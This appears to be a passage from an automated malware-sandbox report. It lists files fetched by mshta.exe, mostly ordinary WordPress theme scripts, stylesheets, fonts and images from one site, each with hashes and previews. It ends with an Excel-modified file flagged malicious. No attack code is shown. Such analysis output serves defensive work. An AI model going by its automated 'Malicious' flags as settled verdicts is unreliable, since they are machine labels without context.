                                        Preview:var Chart=function(s){function v(a,c,b){a=A((a-c.graphMin)/(c.steps*c.stepValue),1,0);return b*c.steps*a}function x(a,c,b,e){function h(){g+=f;var k=a.animation?A(d(g),null,0):1;e.clearRect(0,0,q,u);a.scaleOverlay?(b(k),c()):(c(),b(k));if(1>=g)D(h);else if("function"==typeof a.onAnimationComplete)a.onAnimationComplete()}var f=a.animation?1/A(a.animationSteps,Number.MAX_VALUE,1):1,d=B[a.animationEasing],g=a.animation?0:1;"function"!==typeof c&&(c=function(){});D(h)}function C(a,c,b,e,h,f){var d;a=.Math.floor(Math.log(e-h)/Math.LN10);h=Math.floor(h/(1*Math.pow(10,a)))*Math.pow(10,a);e=Math.ceil(e/(1*Math.pow(10,a)))*Math.pow(10,a)-h;a=Math.pow(10,a);for(d=Math.round(e/a);d<b||d>c;)a=d<b?a/2:2*a,d=Math.round(e/a);c=[];z(f,c,d,h,a);return{steps:d,stepValue:a,graphMin:h,labels:c}}function z(a,c,b,e,h){if(a)for(var f=1;f<b+1;f++)c.push(E(a,{value:(e+h*f).toFixed(0!=h%1?h.toString().split(".")[1].length:0)}))}function A(a,c,b){return!isNaN(parseFloat(c))&&isFinite(c)&&a>c?c:!isNaN(parseFloat(
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):31422
                                        Entropy (8bit):5.000880526077528
                                        Encrypted:false
                                        SSDEEP:768:TFGFeFRavlJesa3UrJB2ZJFqxF1lFGFesjFXF643F933gVFAMF9J:TIEra9gsa3UrJB2ZJMzlIEsjhEoL33U1
                                        MD5:8ADC9563E564E9A3DE844DF686CAE8A5
                                        SHA1:B97B5FCAD7BEA9E7D88B0462AAA9D3D24376C3E8
                                        SHA-256:B04E93D31D6325159B13956EA9CF31A8B1DB7A02AFD91E781609ADFA651AEF18
                                        SHA-512:C4406AFE68209188474D5960A5DB5E9769E001C648D8B70C9204A3FB6EA7D4F161CD5FA2D349024F7B9F5E9AD145E51A91DD285CE062742CBA29A106C68D03C8
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1
                                        Preview:/* #Shortcodes.================================================== */./* Recent Posts Shortcodes.---------------------------------------- */..recent-posts {. overflow: hidden;. margin: 0 0 0 -20px !important;. padding: 0;. border: none;. list-style: none;. /* Images Format Type */. /* Quote Format Type */. /* Link Format Type */. /* Audio Format Type */. /* Video Format Type */.}..recent-posts_li {. margin: 0 0 20px 20px;. padding: 0;. border: none;. background: none;. list-style-type: none;.}..recent-posts_li .featured-thumbnail {. float: left;. margin: 0 20px 0 0;.}..recent-posts_li h5 {. margin-bottom: 0;. font-size: 1em;.}..recent-posts_li .excerpt {. margin-bottom: 1.5em;.}..recent-posts_li .meta {. display: block;. overflow: hidden;. margin-bottom: .5em;. color: #888;. text-transform: uppercase;. font-size: 10px;.}..recent-posts_li .post-date {. float: left;.}..recent-posts_li .post-comments {. float: right;.}..recent-posts .format-image {. float: left
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS5 Windows, datetime=2014:09:09 11:29:49], baseline, precision 8, 2208x1150, frames 3
                                        Category:downloaded
                                        Size (bytes):891583
                                        Entropy (8bit):7.917669644382096
                                        Encrypted:false
                                        SSDEEP:24576:Q97s84R+LWUXF0xbeQBvylH8MyqDD08UiFod:Q97s83LWUXFZhuqDDZfm
                                        MD5:68287B4A0457A01B4244FBB136D147B7
                                        SHA1:8092DFB1D44BCFDEF01F85778D15B27FFDEF274B
                                        SHA-256:16AA3453FC8DA749206989DA29E9EAD11FD86B52074E177151412F954072C290
                                        SHA-512:84D2908196F325F7B4B801A6826D780E236328D219B1CE9ACC41C6AA342E0C12C6319E0A99C938F8EFA64B080402713B6E4FFD7C68F5B5D7938DE640FA07D028
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/images/content_bg4.jpg
                                        Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS5 Windows.2014:09:09 11:29:49........................................~...........................................&.(.................................L.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................S...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....f{BP..e`-T$.R..U.....$..>H.>..w......E........c....A. .......w.8.v...........-........cC@ua...._.0.......w.....O.g........1...H....$...>.nW..Sh.4....
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):152
                                        Entropy (8bit):5.082226381168297
                                        Encrypted:false
                                        SSDEEP:3:0SYWFFWlIYCZZ5RI5XwDKLRIHDfFRWdFTfqzNsqcdjKIUtB40KHYvn:0IFFN+56ZRWHTizNspdPUtBNv
                                        MD5:2BC56AB743AAE5AAC9AAC55D0850AAC5
                                        SHA1:BFB989317C6BAAE1BAD28B90D9535B19BE847827
                                        SHA-256:5EC882B2726B2C1D1DA1717E2AC16FB43C0C9F34FEA5392B8DE090A47BEF197A
                                        SHA-512:FD901DB8F9B5ED13E5EFC55A750A364D47066509D7415544916AC7A9B3DFFC2A95A7CC3A45811C1A51746A0160A6D5F894CB06D51B0F234A558EFD9290A31F1A
                                        Malicious:false
                                        IE Cache URL:http://fonts.googleapis.com/css?family=Lato&subset=latin
                                        Preview:@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);.}.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):154
                                        Entropy (8bit):5.123661053174663
                                        Encrypted:false
                                        SSDEEP:3:0SYWFFWlIYCZZ5RI5XwDKLRIHDfFU/w7fqzNsqcdjKI9tB8gfKRfvYvn:0IFFN+56ZP7izNspdP9D8LAv
                                        MD5:B3F631391C5184932BA0D5AE887A2924
                                        SHA1:EC95EEB6AEC69F4EC64F20D53B807802716468CD
                                        SHA-256:2E3EDCE076C67951659C01C1A4B07592E6E9FF327D2C89EE660BBF47E2887D9F
                                        SHA-512:B840688F47BE36DD829F1473FB47E0703519968705D0324C62A3D081E557E8F5DC44F6EC7A2148A5B7567EA9800B171FA9F70E198E1948EE6E3006360D3FAD92
                                        Malicious:false
                                        IE Cache URL:http://fonts.googleapis.com/css?family=Lato:100
                                        Preview:@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 100;. src: url(http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot);.}.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):156
                                        Entropy (8bit):5.1208073656474
                                        Encrypted:false
                                        SSDEEP:3:0SYWFFWlIYCZZ5RI5XwDKLRIHDfFWYhfqzNsqcdjKIsfn6vYvn:0IFFN+56ZzhizNspdPsyAv
                                        MD5:F123470D54A5D2FFAADD149D5AD1AAB0
                                        SHA1:3C2F20E79789430AA00C6D7905C3CBF5C397F9A4
                                        SHA-256:9E9E61C05174FAB73421B450A65AB5882D2953DA2BC4501212CAE8F3C53B358C
                                        SHA-512:2ABF321BFFD8233E19D8BB5FFE9FF5D93E1C9E41B0AF63067CC2DA13DFCD80176D3D9D6762D5D36CBE379B5DC122A24A8B190CE6ACDAD5C3CE3D4F754FB58CF0
                                        Malicious:false
                                        IE Cache URL:http://fonts.googleapis.com/css?family=Lato:300
                                        Preview:@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 300;. src: url(http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot);.}.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):152
                                        Entropy (8bit):5.082226381168297
                                        Encrypted:false
                                        SSDEEP:3:0SYWFFWlIYCZZ5RI5XwDKLRIHDfFRWdFTfqzNsqcdjKIUtB40KHYvn:0IFFN+56ZRWHTizNspdPUtBNv
                                        MD5:2BC56AB743AAE5AAC9AAC55D0850AAC5
                                        SHA1:BFB989317C6BAAE1BAD28B90D9535B19BE847827
                                        SHA-256:5EC882B2726B2C1D1DA1717E2AC16FB43C0C9F34FEA5392B8DE090A47BEF197A
                                        SHA-512:FD901DB8F9B5ED13E5EFC55A750A364D47066509D7415544916AC7A9B3DFFC2A95A7CC3A45811C1A51746A0160A6D5F894CB06D51B0F234A558EFD9290A31F1A
                                        Malicious:false
                                        IE Cache URL:http://fonts.googleapis.com/css?family=Lato:400
                                        Preview:@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 400;. src: url(http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);.}.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):156
                                        Entropy (8bit):5.138466900917678
                                        Encrypted:false
                                        SSDEEP:3:0SYWFFWlIYCZZ5RI5XwDKLRIHDfFS/w7fqzNsqcdjKIsk2SU6vYvn:0IFFN+56ZN7izNspdPsk2SU6Av
                                        MD5:61D55D02CF44B8A326A1504988A4955C
                                        SHA1:1641427E2A855C452FF71C3DD8014419376A30AD
                                        SHA-256:313F45400B50542F391871B43C708EADBDB23BFD4549EB8017A7192351FC41E4
                                        SHA-512:E8C3F9EEB19793334FDBF6CDE1731F09900F5BC20FAF3A1B6F76B796FCACB31324109280489923EBB66BEDEE242A6CD8B6654D80D95D9F523EC12CF633816127
                                        Malicious:false
                                        IE Cache URL:http://fonts.googleapis.com/css?family=Lato:700
                                        Preview:@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 700;. src: url(http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot);.}.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):156
                                        Entropy (8bit):5.133627878467913
                                        Encrypted:false
                                        SSDEEP:3:0SYWFFWlIYCZZ5RI5XwDKLRIHDfFcYFTfqzNsqcdjKIsWg6vYvn:0IFFN+56Z1FTizNspdPsWg6Av
                                        MD5:BC9F29EE3D832A38F914975FD3C14848
                                        SHA1:970307BD837AB5B3380A1BAE698091F2E080F5E3
                                        SHA-256:EE49572B06F53A4EA8DB5798B07507AA2D3E535FF443C27AE315177B0164FF42
                                        SHA-512:EBFADAD58232A738039F1D75523E3CB36928E4E2846A60CCA8B66AC7820666F7A6523AAF2622CD05B3102DCA4F61BAAA4EC7001C8A5D8D7B0D340E4976456370
                                        Malicious:false
                                        IE Cache URL:http://fonts.googleapis.com/css?family=Lato:900
                                        Preview:@font-face {. font-family: 'Lato';. font-style: normal;. font-weight: 900;. src: url(http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot);.}.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):5333
                                        Entropy (8bit):5.251194517626103
                                        Encrypted:false
                                        SSDEEP:96:i7Xo1sX/me8vbi9uq5r+iM19dnFMoOsSyM4WtKNOk:SGsuvbi9odedXyM3tKgk
                                        MD5:739E27C21C55279E44DCF1C1967E8F5F
                                        SHA1:F95C101BABBBA485FE49C82991C8299C90D001D9
                                        SHA-256:611C66D42B9CC55CFA24BA8FC857B9ED01B78E2A5C2A954BC7DD70A889A7AD19
                                        SHA-512:1DE4C427F75F4F9E9EA3BA37EB697C5E768EBE403CE2E410872CD18C22DB60D4EE0D032D795C9BCA03CE793D84D23B68BA963BF4110D8537F7E2D29B1D5B809C
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0
                                        Preview:jQuery(document).ready(function(){..var...windowSelector = jQuery(window)..;...windowSelector.resize(function(){...jQuery('.gmap_container').css({ 'width': windowSelector.width(), 'left':'50%', 'margin-left': windowSelector.width()/-2 });...jQuery('.gmap_container2').css({ 'width': windowSelector.width(), 'left':'50%', 'margin-left': windowSelector.width()/-2 });...jQuery('.content_container1').css({ 'width': windowSelector.width(), 'left':'50%', 'margin-left': windowSelector.width()/-2 });..}).trigger("resize");...jQuery('.cherry_media_parallax_1').fadeTo(0, 0);...})..$(function() {..var...menuWrap = $('.header .menu_wrap')..,.offsetArray = []..,.offsetValueArray = []..,._document = $(document)..,.currHash = ''..,.isAnim = false..,.isHomePage = $('body').hasClass('home')? true:false..;....//--------------------------- Menu navigation ---------------------------..$('#topnav > li', menuWrap).each(function(){...if($(this).hasClass('menu-item-type-custom')){....var newUrl = $('header .log
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):27231
                                        Entropy (8bit):4.969538355156986
                                        Encrypted:false
                                        SSDEEP:384:V4CBhTJwxFGFepFFVofu2NF2advHrGlmBpa/pe:zBEFGFepFvoGOkadvHz3Ke
                                        MD5:2D53B06F292DCB355B5E1A39EC065054
                                        SHA1:57CA25A18CBDEDF36973B712BC81F9E3F883A371
                                        SHA-256:22A22E76F4DE930E54DD33AF00C71B68828847409E5E79787DF5224DD9776C6F
                                        SHA-512:83C4394957069679994F7C04B1643AF895733E3469B539F9D202934FA5F808D31CB42EDF92029F23E849DEDD45EC50BB90D0009C3FA4450E8E50AB9C832313DA
                                        Malicious:false
                                        IE Cache URL:http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                        Preview:/*!. * Font Awesome 3.2.1. * the iconic font designed for Bootstrap. * ------------------------------------------------------------------------------. * The full suite of pictographic icons, examples, and documentation can be. * found at http://fontawesome.io. Stay up to date on Twitter at. * http://twitter.com/fontawesome.. *. * License. * ------------------------------------------------------------------------------. * - The Font Awesome font is licensed under SIL OFL 1.1 -. * http://scripts.sil.org/OFL. * - Font Awesome CSS, LESS, and SASS files are licensed under MIT License -. * http://opensource.org/licenses/mit-license.html. * - Font Awesome documentation licensed under CC BY 3.0 -. * http://creativecommons.org/licenses/by/3.0/. * - Attribution is no longer required in Font Awesome 3.0, but much appreciated:. * "Font Awesome by Dave Gandy - http://fontawesome.io". *. * Author - Dave Gandy. * -------------------------------------------------------------
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):21638
                                        Entropy (8bit):5.19976778726859
                                        Encrypted:false
                                        SSDEEP:384:6zEjb38fdvqEqHLOB7/Y1zicwyWda6lo7iMrpLtwSO2BAw1EFO:6838fdvqEqCBk1zzWda6loeMdLt9O5bA
                                        MD5:9EC3C315B67F434AABC4DA58EABC6C3A
                                        SHA1:51B3A7D882F438D53DC69CA5289E92254160C09A
                                        SHA-256:0C853C2CC205BAFE5D893017B6A03A2ACF0F04A11B85F80605514CF0AE540FE6
                                        SHA-512:75317411016A28DFF4E7A1D68F7B604B7B08E0BE90038C3039493123FE2A89EBBFC084E1E15C029CBADCB64EFAD2A122307957D8BA51E17EF42FFF35A8A3922C
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2
                                        Preview:/*. * jQuery FlexSlider v2.2.2. * Copyright 2012 WooThemes. * Contributing Author: Tyler Smith. */.!function(a){a.flexslider=function(b,c){var d=a(b);d.vars=a.extend({},a.flexslider.defaults,c);var j,e=d.vars.namespace,f=window.navigator&&window.navigator.msPointerEnabled&&window.MSGesture,g=("ontouchstart"in window||f||window.DocumentTouch&&document instanceof DocumentTouch)&&d.vars.touch,h="click touchend MSPointerUp",i="",k="vertical"===d.vars.direction,l=d.vars.reverse,m=d.vars.itemWidth>0,n="fade"===d.vars.animation,o=""!==d.vars.asNavFor,p={},q=!0;a.data(b,"flexslider",d),p={init:function(){d.animating=!1,d.currentSlide=parseInt(d.vars.startAt?d.vars.startAt:0,10),isNaN(d.currentSlide)&&(d.currentSlide=0),d.animatingTo=d.currentSlide,d.atEnd=0===d.currentSlide||d.currentSlide===d.last,d.containerSelector=d.vars.selector.substr(0,d.vars.selector.search(" ")),d.slides=a(d.vars.selector,d),d.container=a(d.containerSelector,d),d.count=d.slides.length,d.syncExists=a(d.vars.sync).lengt
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):403
                                        Entropy (8bit):4.793570624792053
                                        Encrypted:false
                                        SSDEEP:6:Mwq7sFnOst7+pArYTKfZ0ArB3Ozgr9sjrez5yzNLAWzlYTrw5SN3FLmiYR0vY:MDZs5ybn3grwOQZRzlymiYR0A
                                        MD5:D836CAC74A1D9528BE73EE745D64B8CA
                                        SHA1:D8269C3090161BAA21C97DF370E32C68F512C1A8
                                        SHA-256:E3BAB86A4895EB161114F42EC7EBD54534D90ED21691B986AB7C7C6C5DD1D57C
                                        SHA-512:966C80EC83F820D8EDA03CD01ABBBEBA8C79AE5098777E533F7A38134379CF921E25B3C17837502D34CD69B002009F955740FF30D7ED8DB76776B421BE48E501
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0
                                        Preview:body .main-holder {..overflow: hidden;..position: static;.}..parallax-box {..position: relative;.}..parallax-content {..position: relative;..z-index: 2;.}..parallax-bg {..position: absolute;..overflow:hidden;..top: 0;..left: 0;..width: 100%;..height:100%;.}..parallax-bg-inner {..position:relative;..background-repeat: no-repeat;..background-size: cover;..background-position: center;..max-width:none;.}
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):14585
                                        Entropy (8bit):5.05967424474738
                                        Encrypted:false
                                        SSDEEP:384:Y0KR2j16xNN7FUx4fCauIC+V+oeBKdYYJfRscKvVJVw1Iv3S3OVKEkl9UQznC:Rrj16xNN7Cx4fj4+WVJ/v3ZVAC
                                        MD5:80F051B85C7CC301D20DC6C522C71814
                                        SHA1:D8344EEE926EBE2F35396F51CFA5614CB4307B40
                                        SHA-256:C6138C4B65AAFF6E46D51C26096FFFFADD202974003AD0F6D4475B45204BD0AB
                                        SHA-512:24BF9B3B18299B678273D028F81BB9B5816E2EB98402D6CD9ADAAEA755C56F6D1FC2E49B2F86248DFAE341E7127458DC0BD2F62C41DC020E16D251FD3E0262A2
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3
                                        Preview:( function( $ ) {...'use strict';...if ( typeof wpcf7 === 'undefined' || wpcf7 === null ) {...return;..}...wpcf7 = $.extend( {...cached: 0,...inputs: []..}, wpcf7 );...$( function() {...wpcf7.supportHtml5 = ( function() {....var features = {};....var input = document.createElement( 'input' );.....features.placeholder = 'placeholder' in input;.....var inputTypes = [ 'email', 'url', 'tel', 'number', 'range', 'date' ];.....$.each( inputTypes, function( index, value ) {.....input.setAttribute( 'type', value );.....features[ value ] = input.type !== 'text';....} );.....return features;...} )();....$( 'div.wpcf7 > form' ).each( function() {....var $form = $( this );....wpcf7.initForm( $form );.....if ( wpcf7.cached ) {.....wpcf7.refill( $form );....}...} );..} );...wpcf7.getId = function( form ) {...return parseInt( $( 'input[name="_wpcf7"]', form ).val(), 10 );..};...wpcf7.initForm = function( form ) {...var $form = $( form );....$form.submit( function( event ) {....if ( typeof window.FormD
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:UTF-8 Unicode (with BOM) text
                                        Category:downloaded
                                        Size (bytes):1506
                                        Entropy (8bit):3.8120848042014237
                                        Encrypted:false
                                        SSDEEP:24:qzzEbPmDAFSbEigNMtDsmkKnxN8kKOx0STxHxKfZlJhYCpI0:+EKxJrk5kfdcfHkCB
                                        MD5:6B49B3E0D4EBC1DC791F05F077A218C4
                                        SHA1:710F5BA21E2E6BFAC71559BA8B3AB5AF5685A856
                                        SHA-256:A3A8314DF976D890F6389F1F9AA6B955A5069FBBF8EC6B546E6EDAF298B2DD93
                                        SHA-512:1A96C3D8D6514F95480C971A172A86046A2D534253EF0800A75D8F8834208F9954B9D0FAA344C9AA5CB2B796F520A5FD25FBDA9BA3F070AC5458E58681C38873
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0
                                        Preview:.(function($){. $.fn.scrollShowTime=function(o){. var getOption = {. correctionY: 100. , onShow: function(){}. }. $.extend(getOption, o);. . return this.each(function(){. var _this = $(this). ,topOffset. ,windowHeight. ,_visible=false. ,_win=$(window). ,_doc=$(document). ;. init();. function init(){. setTopOffset();. _this.addClass('hide_state');. addEventHandler();. }//end init. function setTopOffset(){. topOffset = _this.offset().top;. }. function addEventHandler(){. $(window).on('scroll',function(){. setTopOffset();. positionListener();. }).trigger('scroll');. . $(window).on('resize', function(){. setTopOffse
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):2913
                                        Entropy (8bit):5.1479046643148605
                                        Encrypted:false
                                        SSDEEP:48:uDmDV1xEm0TSDDdVVsIro4VmfYIy8G7HzjiYqcq6nQxzRqnICijh2eqicoj:uDmDOjKDdVpro4VmmjiYPq2ICQdcoj
                                        MD5:259022BDE29C49E9D273D33493BD7B01
                                        SHA1:16A4305C60037A05644EEF5BD7C1AFC5BBD5D74A
                                        SHA-256:6301E8E9AB12CACCBF4EB772E114D56F4BDF3A27875CDCAB57E8E8AF5E04CB5A
                                        SHA-512:9E627852C7F6AF6EFA7BB74A812875D5907A8EFCAFF761EA815A99281EE2076233103A701319637417B1FC923E27658DD7F701CCCBDA9F9B1C06A8644CE18A73
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3
                                        Preview:(function(a){a.fn.superfish=function(f){var d=a.fn.superfish,e=d.c,g=a('<span class="'+e.arrowClass+'"> &#187;</span>'),k=function(c){var b=a(this),d=j(b);("mouseenter"===c.type||"focusin"===c.type)&&b.children("a").data("follow",!0);clearTimeout(d.sfTimer);b.showSuperfishUl().siblings().hideSuperfishUl()},l=function(c){var b=a(this),f=j(b),e=d.op,g=function(){e.retainPath=-1<a.inArray(b[0],e.$path);b.hideSuperfishUl();e.$path.length&&1>b.parents("li."+e.hoverClass).length&&(e.onIdle.call(),a.proxy(k,.e.$path,c)())};"mouseleave"!==c.type&&"focusout"!==c.type?g():(clearTimeout(f.sfTimer),f.sfTimer=setTimeout(g,e.delay));("mouseleave"===c.type||"focusout"===c.type)&&b.children("a").data("follow",!1)},j=function(c){c.hasClass(e.menuClass)&&a.error("Superfish requires you to update to a version of hoverIntent that supports event-delegation, such as this one: https://github.com/joeldbirch/onHoverIntent");c=c.closest("."+e.menuClass)[0];d.op=d.o[c.serial];return c},m=function(c){var b=a(this
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 10 x 19, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):207
                                        Entropy (8bit):5.824703976565338
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlHstj5l7prtxBlly43g/3MkOl0tDlX4wkBDjW3PsFmCsyxxZ2UGclC:6v/lhPWtVl1QHMkdJ4nDi3UqfclKh3p
                                        MD5:D6AE4F341752017AB0E603E3BB9260B7
                                        SHA1:C84C11D3BC69C7E14B2F75E7DEA6E0AC93DEE1E2
                                        SHA-256:8C2AD9254589A597B65DAE284A6DA49DBFE1E3C8E628B03B80883D980FB6435E
                                        SHA-512:136F04B44FC3194FB2DDA6DDE51AB0B83CE15BCD129EAD332053114675423D9E21E02769969D7037BC282F59AE11E673B61E2B3977253C54D8C5270FA72228FA
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-content/plugins/gtranslate/switcher.png
                                        Preview:.PNG........IHDR....................sBIT....|.d.....pHYs...........~.....tEXtCreation Time.01/09/10.......tEXtSoftware.Adobe Fireworks CS4......'IDAT(.c|....."..###1.B&.T...Q..QH.(..5/.?..Q-....IEND.B`.
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines
                                        Category:downloaded
                                        Size (bytes):11943
                                        Entropy (8bit):5.096253847639827
                                        Encrypted:false
                                        SSDEEP:192:WuKiKqdccoXJW+TJr3J//bEvAbWXXR6AooHyrOUVsbEJEoesM0m3dJXWP/2//:0qlkJW+TJr3J//bEI+XgA5UCOeffJmW3
                                        MD5:FE0575B66568074463F12485D90F6D4C
                                        SHA1:AEEDD9AB3B7874E63F647042963CB1301A38B391
                                        SHA-256:647A6B36F3FD1F21BAE171270111096B4613C23A47E6621628A51BAE9C82B0B7
                                        SHA-512:0D209CBC9550CFCF49CA7CA5A1243E1578C0A42F9FB28C1FA8D353CEA26F24EED282547F47FE858126E1BA9A4AA4D8DDBD2CBDEF9DB5A45F24CFBFD6383BFF9E
                                        Malicious:false
                                        IE Cache URL:http://facextrade.com.br/wp-includes/js/wp-emoji-release.min.js?ver=4.9.20
                                        Preview:// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return a(d);return a(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,t){return o(d,function(d){var u,f,e=d,c=x(d),a=t.callback(c,t);if(a){for(f in e="<img ".concat('class="',t.className,'" ','draggable="false" ','alt="',d,'"',' src="',a,'"'),u=t.attributes(d,c))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===e.indexOf(" "+f+"=")&&(e=e.concat(" ",f,'="',u[f].replace(n,r),'"'));e=e.concat("/>")}return e})}:function(d,u){var f,e,c,a,t,n,r,b,o,i,s,l=function d(u,f){var e,c,a=u.childNodes,t=a.length;for(;t--;)e=a[t],3===(c=e.nodeType)?f.push(e):1!==c||"ownerSV
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):85
                                        Entropy (8bit):4.505597114916199
                                        Encrypted:false
                                        SSDEEP:3:Fg1Qg+JXv7YoaROkz1Pv:Fd39aRO+v
                                        MD5:8B4739E938C28E07944D7AA784BE7E28
                                        SHA1:3EE6D7067A050983DF3AF69CD04020D6CB6D2DEB
                                        SHA-256:447226FC07304480BBBDE65BEF0439C0DF8114B85F23C806DA64B4C716B955EF
                                        SHA-512:6399C1BFAE132FB143B19746D1B63423CB19D368B93557AE8B6D3F2A09C39FA7C3595606AE2CA5C1C66258B264715BBCEC10D688C59B877B807AAA8B2BFC78E6
                                        Malicious:false
                                        IE Cache URL:google.com/
                                        Preview:CONSENT.PENDING+957.google.com/.2147484673.3994554624.31125231.2261508258.30978457.*.
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1126
                                        Entropy (8bit):4.492674933696318
                                        Encrypted:false
                                        SSDEEP:24:sj4MyluZiolTQP64K6o80dGo3ahMowo4oM2ocnhg:sj4R8
                                        MD5:20484F4A7D41C5F54A0DC7A7D35C2155
                                        SHA1:0B197C48D648BBDC131DCA6D4FB89903303372F9
                                        SHA-256:6DF10DD726CEF49360DF78C47651A311EA7BB21064FE77E019E223EF32776072
                                        SHA-512:94DF430C3890D5BA23618283EA6EAA6AA0C74D19C5E049F3CC4D65A464266CCC2EEFCCDB59D6464606200B2E51CDC9B57C2534C67ADED228D00A54D856C98591
                                        Malicious:true
